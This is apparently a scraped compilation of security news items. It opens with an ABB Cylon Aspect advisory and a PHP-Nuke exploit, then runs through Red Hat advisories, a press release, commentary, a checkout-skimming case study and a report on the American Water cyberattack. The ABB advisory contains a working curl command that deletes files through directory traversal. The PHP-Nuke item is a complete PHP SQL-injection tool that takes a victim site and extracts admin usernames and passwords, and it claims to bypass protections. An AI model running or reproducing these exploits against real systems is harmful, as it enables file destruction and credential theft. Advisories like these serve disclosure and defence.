ABB Cylon Aspect version 3.08.01 suffers from an arbitrary file deletion vulnerability. Input passed to the file parameter in calendarFileDelete.php is not properly sanitized before being used to delete calendar files. This can be exploited by an unauthenticated attacker to delete files with the permissions of the web server using directory traversal sequences passed within the affected POST parameter.

ABB Cylon Aspect 3.08.01 (calendarFileDelete.php) Arbitrary File Deletion

Vendor: ABB Ltd. 
Product web page: https://www.global.abb 
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio 
 Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management 
and control solution designed to allow users seamless access to their 
building data through standard building protocols including smart devices.

Desc: The BMS/BAS controller suffers from an arbitrary file deletion vulnerability. 
Input passed to the 'file' parameter in calendarFileDelete.php is not properly 
sanitised before being used to delete calendar files. This can be exploited by an 
unauthenticated attacker to delete files with the permissions of the web server using 
directory traversal sequences passed within the affected POST parameter.

Tested on: GNU/Linux 3.15.10 (armv7l) 
 GNU/Linux 3.10.0 (x86_64) 
 GNU/Linux 2.6.32 (x86_64) 
 Intel(R) Atom(TM) Processor E3930 @ 1.30GHz 
 Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz 
 PHP/7.3.11 
 PHP/5.6.30 
 PHP/5.4.16 
 PHP/4.4.8 
 PHP/5.3.3 
 AspectFT Automation Application Server 
 lighttpd/1.4.32 
 lighttpd/1.4.18 
 Apache/2.2.15 (CentOS) 
 OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) 
 OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 
 @zeroscience

Advisory ID: ZSL-2024-5836 
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5836.php

21.04.2024

--

$ cat project

 P R O J E C T

 .| 
 | | 
 |'| ._____ 
 ___ | | |. |' .---"| 
 _ .-' '-. | | .--'| || | _| | 
 .-'| _.| | || '-__ | | | || | 
 |' | |. | || | | | | || | 
 ____| '-' ' "" '-' '-.' '` |____ 
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
 ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
 ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

 $ curl -X POST http://192.168.73.31/calendarFileDelete.php \ 
> -d "file0=../../../../../../../../../home/thricer/.secrets/nude_selfie.jpg\ 
> &delete0=1\ 
> &total=1\ 
> &submitDeleteForm=Delete"

ABB Cylon Aspect 3.08.01 calendarFileDelete.php Arbitrary File Deletion

The Top module for PHP-Nuke versions 6.x and below 7.6 suffers from a remote SQL injection vulnerability.

# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass )# Google Dork: intext: Powered by PHP-Nuke# Date: 2024-10-07# Exploit Author: Emiliano Febbi# Vendor Homepage: https://phpnuke.org/# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/# Version: 6.x < 7.6# Tested on: Windows 10[code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage.<?phpecho '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center><body bgcolor="black"><body link="yellow"><pre>new exploit concept#######################################################################This exploit is for Top Module of PHP-Nuke 6.x < 7.6 ##auto-bypass *illegal operation* , *mod security* , *NukeSentinel* ##allowed http and https protocols. Code by Emiliano Febbi #######################################################################</pre><form action="'.$SERVER[PHP_SELF].'" method="POST">~ insert victim site ~ (*the folder must be specified) <input type="text" name="victim" value="http://www.site.com"> <label for="dlt">++method++</label><select name="exploit_nuke" id="lang"><option value="one">#1</option><option value="two">#2</option></select> <input type="submit" value="launch!"/> </form></body></html>';if($_POST['victim']) { $site = $_POST['victim']; $j = $_POST['exploit_nuke']; switch ($j) { /*#method1*/ case "one": /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a> "; else echo "~missing Admin Login "; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active! "; else echo "#Top Module not Active! "; print '-------------------------------------- '; /*#Get user1*/ print "#user1: "; $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user); $comment_user=explode("</a>",$comment_user[1]); var_dump(strip_tags($comment_user[0])); echo " "; /*#Get pwd1*/ print "#password1: "; $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment=explode('<a href="modules.php?name=Surveys&pollID=1">',$content); $comment=explode("</a>",$comment[1]); var_dump(strip_tags($comment[0])); echo " "; /*#Get user2*/ print "#user2: "; $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user2); $comment_user2=explode("</a>",$comment_user2[2]); var_dump(strip_tags($comment_user2[0])); echo " "; /*#Get pwd2*/ print "#password2: "; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content2); $comment2=explode("</a>",$comment2[2]); var_dump(strip_tags($comment2[0])); echo " "; break;/*###################################################################################################################################*/ case "two": /*#method2*/ /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a> "; else echo "~missing Admin Login "; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active! "; else echo "#Top Module not Active! "; print '-------------------------------------- '; /*#Get user1*/ print "#user1: "; $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userj=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userj); $comment_userj=explode("</a>",$comment_userj[1]); var_dump(strip_tags($comment_userj[0])); echo " "; /*#Get pwd1*/ print "#password1: "; $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userp=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userp); $comment_userp=explode("</a>",$comment_userp[1]); var_dump(strip_tags($comment_userp[0])); echo " "; /*#Get user2*/ print "#user2: "; $content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userz=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userz); $comment_userz=explode("</a>",$comment_userz[2]); var_dump(strip_tags($comment_userz[0])); echo " "; /*#Get pwd2*/ print "#password2: "; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userq=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userq); $comment_userq=explode("</a>",$comment_userq[2]); var_dump(strip_tags($comment_userq[0])); echo " "; break; };; };;;?>[/code]

PHP-Nuke Top Module SQL Injection

Red Hat Security Advisory 2024-7725-03 - Red Hat OpenShift Service Mesh Containers for 2.5.5. Issues addressed include code execution and denial of service vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7725.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift Service Mesh Containers for 2.5.5Advisory ID:        RHSA-2024:7725-03Product:            Red Hat OpenShift Service MeshAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7725Issue date:         2024-10-08Revision:           03CVE Names:          CVE-2024-23326====================================================================Summary: Red Hat OpenShift Service Mesh Containers for 2.5.5This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives adetailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.Security Fix(es):* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule(CVE-2024-43788)* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)* envoy: Brotli decompressor infinite loop (CVE-2024-32976)* envoy: abnormal termination when using auto_sni with authority header longerthan 255 characters (CVE-2024-32475)* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-23326References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2259228https://bugzilla.redhat.com/show_bug.cgi?id=2272986https://bugzilla.redhat.com/show_bug.cgi?id=2276149https://bugzilla.redhat.com/show_bug.cgi?id=2283145https://bugzilla.redhat.com/show_bug.cgi?id=2308193https://bugzilla.redhat.com/show_bug.cgi?id=2311153https://bugzilla.redhat.com/show_bug.cgi?id=2311154https://bugzilla.redhat.com/show_bug.cgi?id=2311171https://bugzilla.redhat.com/show_bug.cgi?id=2313683

Red Hat Security Advisory 2024-7725-03

Red Hat Security Advisory 2024-7724-03 - Red Hat OpenShift Service Mesh Containers for 2.4.11. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7724.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift Service Mesh Containers for 2.4.11Advisory ID:        RHSA-2024:7724-03Product:            Red Hat OpenShift Service MeshAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7724Issue date:         2024-10-08Revision:           03CVE Names:          CVE-2024-32475====================================================================Summary: Red Hat OpenShift Service Mesh Containers for 2.4.11This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives adetailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.Security Fix(es):* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)* envoy: Brotli decompressor infinite loop (CVE-2024-32976)* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32475References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2276149https://bugzilla.redhat.com/show_bug.cgi?id=2283145https://bugzilla.redhat.com/show_bug.cgi?id=2308193https://bugzilla.redhat.com/show_bug.cgi?id=2311153https://bugzilla.redhat.com/show_bug.cgi?id=2311154

Red Hat Security Advisory 2024-7724-03

San Francisco, CA, 8th October 2024, CyberNewsWire

**San Francisco, CA, October 8th, 2024, CyberNewsWire**

Partnership aims to help businesses eliminate vulnerable attack surfaces and provide a more streamlined user experience.

**Badge Inc****.**, the award-winning privacy company enabling Identity without Secrets™, today announced a partnership with CyberArk and the public release of its integration in the CyberArk Marketplace.

According to the CyberArk website: The Badge CyberArk Identity integration allows specified users to authenticate into CyberArk Identity and its downstream apps and services, using Badge. This enables user-centric privacy, allowing users to issue and revoke digital identity and keys on-demand using biometrics and/or other factors.

The blog post mentions that privileged users hold highly sensitive access credentials and face an ever-increasing threat surface. This has made these users and their credentials prime targets for cyber-attacks. By leveraging Badge’s technology to eliminate the storage of user credentials, organizations benefit unprecedented security, while maintaining a great user experience.

> Archit Lohokare, CyberArk’s GM for Workforce Solutions, “CyberArk is excited to partner with Badge and offer this new integration. It is an important step forward in our mission to deliver comprehensive identity security solutions across all identities and all environments. Badge’s expertise in eliminating stored secrets and removing friction in difficult use cases complements our identity security platform.”

**Integration to CyberArk Marketplace**

Badge and CyberArk are launching a new integration that: 

1.  Enables unprecedented multi-factor authentication experience across all channels, including new and shared devices,
2.  Offers next-generation privacy technology and a more streamlined user experience to customers
3.  Brings phishing-resistant authentication to account recovery workflows.

> “We’re proud to partner with CyberArk. This integration represents a pivotal step forward in the quest to defeat cyber threats targeting privileged accounts. Stored privileged credentials are a high-target vulnerability, and eliminating this weak point is a big step forward. It also underscores the importance of innovative cybersecurity solutions and demonstrates how advancements in technology can be leveraged to enhance security measures across the board,” said Dr. Tina P. Srivastava, Badge Co-founder. “By addressing the vulnerabilities associated with traditional authentication methods like passwords, organizations can protect their most critical assets more effectively, ensuring that their ‘keys to the kingdom’ remain out of reach from cyber adversaries.”

As cyber threats evolve, so are the approaches to cybersecurity. Together, Badge and CyberArk are helping businesses eliminate vulnerable attack surfaces and provide a more streamlined user experience.

**About CyberArk** 

CyberArk is the global leader in identity security. Centered on intelligent privilege controls, CyberArk provides the most comprehensive security offering for any identity – human or machine – across business applications, distributed workforces, hybrid cloud environments and throughout the DevOps lifecycle. The world’s leading organizations trust CyberArk to help secure their most critical assets.

**About Badge**

Badge enables privacy-preserving authentication to every application, on any device, without storing user secrets or PII. Badge’s patented technology allows users to derive private keys on the fly using their biometrics and factors of choice without the need for hardware tokens or secrets. Badge was founded by field-tested cryptography PhDs from MIT and is venture-backed by tier 1 investors. Customers and partners include top Fortune companies across healthcare, banking, retail, and services. To learn more: **www.badgeinc.com****.**

**Contact**

**Media Contact**  
**John O’Brien**  
**SBS Comms**  
**\[email protected\]**

Badge and CyberArk Announce Partnership to Redefine Privacy in PAM and Secrets Management

Company leadership needs to ensure technology teams are managing continuous monitoring, automated testing, and alignment with business needs across their enterprise.

Source: Stu Gray via Alamy Stock Photo

COMMENTARY

This summer, a cyberattack disrupted the normal operations of thousands of auto dealerships across the United States, affecting everything from records to scheduling, causing no end to annoyances and leaving hordes of exasperated salespeople and customers at their wits' end.

The most recent and dramatic example of hacker success illustrates that IT security must become the first priority at the highest levels of an organization. This modern-day plague shows no sign of subsiding. With each successful attack, hackers become even more emboldened. 

It's an all-out assault, requiring the corporate equivalent of an all-points bulletin. In short, cybersecurity is not just an IT issue; it's a critical business risk that requires active involvement from the entire C-suite, in particular, the CEO. This is one area of the enterprise that may benefit from micromanagement in an effort to display the importance of the pursuit.

My colleagues and I regularly advise our clients that they should be asking three questions of their team: What are we doing? Is it enough? How do we know?

Effective cybersecurity requires the right balance of spending and technology value, continuous assessment, and the adoption of advanced technologies such as automation and artificial intelligence. Few regret wise investments in cybersecurity defenses.

The increasing frequency and sophistication of cyberattacks underscore the seriousness for executive-level engagement in cybersecurity. Recent incidents, such as the SEC's $10 million fine on the New York Stock Exchange's parent company and the notorious SolarWinds action, illustrate the severe impact on business operations and regulatory compliance. These events highlight the necessity for CEOs to recognize their critical role in cybersecurity. 

Ascension Healthcare's ransomware attack, among other prime examples, serves as an object lesson in the urgency of the matter, especially in healthcare. Doctors and pharmacies struggled with order and prescription issues, leading to lost revenue as patients sought services elsewhere, and virtually bringing the massive hospital system to its figurative knees, causing tremendous frustration among staff and patients. This situation underscored the need for technologists to understand business operations and implement security measures that support the business. 

CEOs must understand that cybersecurity is central to their management duties and not just "tech stuff" to be delegated. They need to receive business-outcome-focused reporting with the same level of rigor as financial and safety reporting. This reporting should answer the above three questions using system-generated metrics and integrate results into business decisions to stay ahead of the increasingly destructive capabilities of adversaries conspiring to do them harm.

CEOs set the organizational tone and ultimately are responsible for cybersecurity. Their endorsement of security measures can drive home their importance, ensure alignment with business goals across the senior leadership team, and communicate capabilities to their boards. The following steps are essential for CEOs to prioritize cybersecurity:

*   Engage in cybersecurity planning and response: CEOs and executive leaders must be actively involved in cybersecurity planning and response. Their endorsement and understanding of cybersecurity's importance can fuel organizational commitment and set the right tone. Deciding how to handle hypothetical ransom, extortion, and fraud events accelerates response when an event occurs.
    

*   Conduct business analysis for cyber spending: Utilize business analysis to determine the appropriate cybersecurity investments. Focus on preventive technologies that provide greater risk reduction and ensure that the spending aligns with business priorities.
    

*   Implement multifactor authentication: Ensure that multifactor authentication is in place and effective. Avoid inferior solutions that users can mindlessly click through, and prioritize strong authentication measures for password resets to enhance security.
    

*   Regularly review and assess cybersecurity measures: Frequently review assessment results and address important gaps. This includes adopting automation for continuous threat exposure management and ensuring cybersecurity is integrated into business operations.
    

*   Adopt advanced technologies and continuous testing: Embrace automation and advanced technologies for security testing and closing security gaps. Stay ahead of emerging threats by keeping up with advancements in AI and other technologies.
    

*   Seek independent advice and expertise: Business leaders will be called to answer for hiring well-qualified cybersecurity advisers and executives. Use the three questions to understand the current state of cybersecurity within the organization. Seek independent advice to keep up with current threats and defenses. Obtain board members' cybersecurity expertise combined with other essential business skills, or hire independent advisers to provide valuable insights.
    

What hasn't played out yet is the full impact of increased AI usage by both attackers and defenders. As AI technology advances, organizations must keep up to ensure their cybersecurity measures are effective. A recent survey of IT security officers revealed that increasing use of AI will lead to more security breaches, while, conversely, four in five intend to use AI to guard against those same breaches. The ongoing complexity and expanding surface area of systems likely will lead to an increase in cyberattacks through 2030. This necessitates continuous vigilance, adoption of automation for threat and vulnerability management, and regular reviews of cybersecurity measures. Companies will also have to understand and protect against new AI-enabled systems that they are developing. 

Cyber-risk is inherently a business risk, and effective cybersecurity measures are essential for protecting valuable information and maintaining system availability.

One might argue that cybersecurity can be managed solely by IT departments. However, without executive-level involvement, organizations may face significant business disruptions and regulatory penalties. CEOs must understand their role in cybersecurity to ensure comprehensive protection.

The consistent pattern of cyber incidents causing business disruptions and regulatory fines supports the conclusion that CEO involvement is crucial to ensure that companies can answer the three questions: What are we doing? Is it enough? How do we know? Determining business value at risk and the right amount of protection requires business input. As company leadership, now is the time to ensure that technology teams are managing continuous monitoring, automated testing, and alignment with business needs across the enterprise.

**About the Author**

Managing Director, BPM

Ken Frantz is a transformational IT leader and consultant with experience in global financial services, emerging technology, and top-tier health system networks. He focuses on innovative technology advancement with reduced risk and is interested in high impact/high value opportunities to improve IT operations, deliver value, and help companies grow efficiently and effectively.

Your IT Systems Are Being Attacked. Are You Prepared?

Is your store at risk? Discover how an innovative web security solution saved one global online retailer and its unsuspecting customers from an “evil twin” disaster. Read the full real-life case study here.

The Invisible Threat in Online Shopping
When is a checkout page, not a checkout page? When it's an “evil twin”! Malicious redirects can send unsuspecting shoppers to these perfect-looking

Web Security / Payment Fraud

**Is your store at risk? Discover how an innovative web security solution saved one global online retailer and its unsuspecting customers from an "evil twin" disaster. Read the full real-life case study here.******The Invisible Threat in Online Shopping****

When is a checkout page, not a checkout page? When it's an "evil twin"! Malicious redirects can send unsuspecting shoppers to these perfect-looking fake checkout pages and steal their payment information, so could your store be at risk too? Discover how an innovative web security solution saved one global online retailer and its unsuspecting customers from an "evil twin" disaster. (You can read the full case study here)

****Anatomy of an Evil Twin Attack****

In today's fast-paced world of online shopping, convenience often trumps caution. Shoppers quickly move through product selection to checkout, rarely scrutinizing the process. This lack of attention creates an opportunity for cybercriminals to exploit.

****The Deceptive Redirect****

The attack begins on a legitimate shopping site but uses a malicious redirect to guide shoppers to a fraudulent checkout page. This "evil twin" page is meticulously designed to mimic the authentic site, making it nearly impossible for the average user to detect the deception.

****The Devil in the Details****

The only telltale sign might be a subtle change in the URL. For example:

*   Legitimate: Fabulousclothingstore.com
*   Fraudulent: Fabulousclothingstre.com/checkout

Did you spot the missing 'o'? This technique, known as typosquatting, involves registering domain names that closely resemble legitimate websites.

****The Data Heist****

Once on the fake checkout page, unsuspecting shoppers enter their sensitive financial information, which is then forwarded to the attackers. This stolen data can be used for fraudulent transactions or sold on the dark web, potentially leading to significant financial losses for the victims.

****The Infection Vector: How Websites Get Compromised****

While the specific infection method in this case study remains unclear (a common scenario in cybersecurity incidents), we can infer that the attackers likely employed a common technique such as a cross-site scripting (XSS) attack. These attacks exploit vulnerabilities in website code or third-party plugins to inject malicious scripts.

****Evading Detection: The Art of Obfuscation****

Malicious actors use code obfuscation to bypass traditional security measures. Obfuscation in programming is analogous to using unnecessarily complex language to convey a simple message. It's not encryption, which renders text unreadable, but rather a method of camouflaging the true intent of the code.

****Example of Obfuscated Code****

Developers routinely use obfuscation to protect their intellectual property, but hackers use it too, to hide their code from malware detectors. This is just part of what the Reflectiz security solution found on the victim's website:

\*note: _for obvious reasons, the client wants to stay anonymous. That's why we changed the real url name with a fictional one._

This obfuscated snippet conceals the true purpose of the code, which includes the malicious redirect and an event listener designed to activate upon specific user actions. You can read more about the details of this in the full case study.

****Unmasking the Threat: Deobfuscation and Behavioral Analysis****

Traditional signature-based malware detection often fails to identify obfuscated threats. The Reflectiz security solution employs deep behavioral analysis, monitoring millions of website events to detect suspicious changes.

Upon identifying the obfuscated code, Reflectiz's advanced deobfuscation tool reverse-engineered the malicious script, revealing its true intent. The security team promptly alerted the retailer, providing detailed evidence and a comprehensive threat analysis.

****Swift Action and Consequences Averted****

The retailer's quick response in removing the malicious code potentially saved them from:

1.  Substantial regulatory fines (GDPR, CCPA, CPRA, PCI-DSS)
2.  Class action lawsuits from affected customers
3.  Revenue loss due to reputational damage

****The Imperative of Continuous Protection****

This case study underscores the critical need for robust, continuous web security monitoring. As cyber threats evolve, so too must our defenses. By implementing advanced security solutions like Reflectiz, businesses can protect both their assets and their customers from sophisticated attacks.

For a deeper dive into how Reflectiz protected the retailer from this common yet dangerous threat, we encourage you to read the full case study here.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Case Study: The Evil Twin Checkout Page 

Introduction 
Artificial intelligence (AI) deepfakes and misinformation may cause worry in the world of technology and investment, but this powerful, foundational technology has the potential to benefit organizations of all kinds when harnessed appropriately. 
In the world of cybersecurity, one of the most important areas of application of AI is augmenting and enhancing identity management

Machine Learning / Data Security

**Introduction**

Artificial intelligence (AI) deepfakes and misinformation may cause worry in the world of technology and investment, but this powerful, foundational technology has the potential to benefit organizations of all kinds when harnessed appropriately.

In the world of cybersecurity, one of the most important areas of application of AI is augmenting and enhancing identity management systems. AI-powered identity lifecycle management is at the vanguard of digital identity and is used to enhance security, streamline governance and improve the UX of an identity system.

**Benefits of an AI-powered identity**

AI is a technology that crosses barriers between traditionally opposing business area drivers, bringing previously conflicting areas together:

*   AI enables better operational efficiency by reducing risk and improving security
*   AI enables businesses to achieve goals by securing cyber-resilience
*   AI facilitates agile and secure access by ensuring regulatory compliance

**AI and unified identity**

AI-powered identity delivers the intelligence needed to repel attacks and correct access anomalies impacting our identity infrastructure. However, a key enabler of AI within an identity lifecycle management system is the unification of identity. AI can find applications across a unified identity surface, working symbiotically to meet the requisites of the business drivers.

**AI-powered identity in practice**

When applied appropriately, AI technologies have the power to mitigate access errors and tackle the current onslaught of identity-centered cyberattacks. AI-powered identity can leverage machine learning models to identify signals of an attack, such as behavioral anomalies, that point to a data exfiltration event.

One Identity has capitalized on the power of AI models to enhance and enable various aspects of identity security:

**Risk detection for identity governance and administration (IGA)**

AI-powered identity governance and administration (IGA) offers a method to identify unusual behavior and spot the signals of data exposure and data exfiltration events. One Identity Safeguard uses an AI model known as "Random Forests," a machine learning algorithm combining the output from multiple decision trees to deliver insights. Safeguard analyzes data from such events as mouse movement, keystroke dynamics, login time and command analytics to identify behavioral anomalies and automate attack. Human operators then interact with a dashboard to interpret and make decisions based on the AI-generated output to allow an organization to effectively lower the cybersecurity skills barrier.

**Access management**

Data from access management authentication events can be leveraged to identify a signal of cyberattack and credential compromise. The access event data (e.g., identity, location, device, etc.) is gathered when someone logs in. An authorization decision is made, and security requirements may then use step-up authentication rather than deny access.

However, AI advances this simple model. One Identity OneLogin uses Vigilance AI™ Threat Engine15 to analyze large volumes of data to identify threats. By utilizing User and Entity Behavior Analytics (UEBA), a profile of typical user behavior is created as a baseline. This is then used to identify anomalies and prevent risk.

OneLogin can feed the data from access requests, as well as its derived analytical insights, in the form of rich syslogs into SIEM and SOC systems.

**Entitlement management**

Role-based access is a fundamental principle of identity security. But managing those roles manually can pose a challenge. Machine learning has been used in identity "role mining" or "role discovery" for some time, but a novel application from One Identity delivers the role mining insights directly to the relevant person for streamlined entitlement management.

For example, you can use AI to optimize team role policies on an ongoing basis, making entitlement management an ongoing, automated task that provides accurate insights into access requirements across the organization.

**Conclusion**

Identity management systems must respond to the increasing volume of sophisticated identity-based threats. The response comes in the form of system augmentation through AI, with authoritative, high-quality identity data feeding the AI models used to enhance identity lifecycle management. This capability enhancement is essential in developing and delivering entitle management and IGA for a robust security posture and cyber resilience. With the unification of identity-related services making identity management simpler and more effective, adding AI to a unified identity platform endows an organization with the resilience to resist even the most complex identity-related threats.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Value of AI-Powered Identity

The largest publicly traded water utility in the US was forced to disconnect some of its online systems, and its website and telecommunications system remained unavailable as of Tuesday morning, Oct. 8.

Source: Juri Samsonov via Alamy Stock Photo

The website of the largest publicly traded water utility in the US remained offline this morning after a cyberattack Oct. 3 forced the company to shut down some of its connected systems and services.

American Water is a significant supplier of water in the US, serving more than 14 million customers across 14 states and 18 military installations. The company employees about 6,500 people across its facilities. It discovered "unauthorized activity within its computer networks and systems" on Oct. 3 that turned out to be the result of a cybersecurity incident, the company reported in a Form 8-K filing with the US Securities and Exchange Commission.

The company activated incident-response protocols and enlisted third-party cybersecurity experts to help it contain and mitigate the attack, which included disconnecting and deactivating "certain" systems to "protect" systems and data, it reported.

**Online, Telecom Systems Affected**

The outages appear to have included the company's online customer-facing sites, as the American Water website as well as its "MyWater" customer portal served up white pages with "Forbidden 403" text today.

An attendant who answered a Dark Reading phone call to American Water's headquarters in Camden, N.J., early on Oct. 8 said she was unable to connect to a member of the media relations team, nor leave a message for anyone because the telecommunications system also "is down."

At this time, it seems that none of the company's water or wastewater facilities or operations have been negatively affected by the incident, although it's too soon to predict the full impact and material effect it will have on the company, according to the filing. An investigation alongside law enforcement officials remains ongoing as to the exact cause and extent of the damage.

**Utilities Under Attack**

Critical infrastructure such as the public water supply and electricity grid both in the US and overseas face increasing risk of attack from threat actors, incidents that have the potential to not only affect network infrastructure or financial coffers, but also cause supply shortages or even physical harm.

The now-infamous May 2021 ransomware attack on Colonial Pipeline is a prime example of the former, while a February 2021 attack on a Florida water-treatment facility, which potentially could have poisoned the water supply if an employee hadn't acted quickly, demonstrates the latter.

“We often overlook how vulnerable our everyday essentials are to digital threats," observes Akhil Mittal, senior manager of cybersecurity strategy and solutions at Black Duck (formerly known as Synopsys Software Integrity Group). "We’re not just talking about data breaches — this is about the safety of millions of people who rely on clean water every day. A cyber incident like this could disrupt water services, delay safety checks, and potentially risk public health."

**Regulatory Effort Stalled**

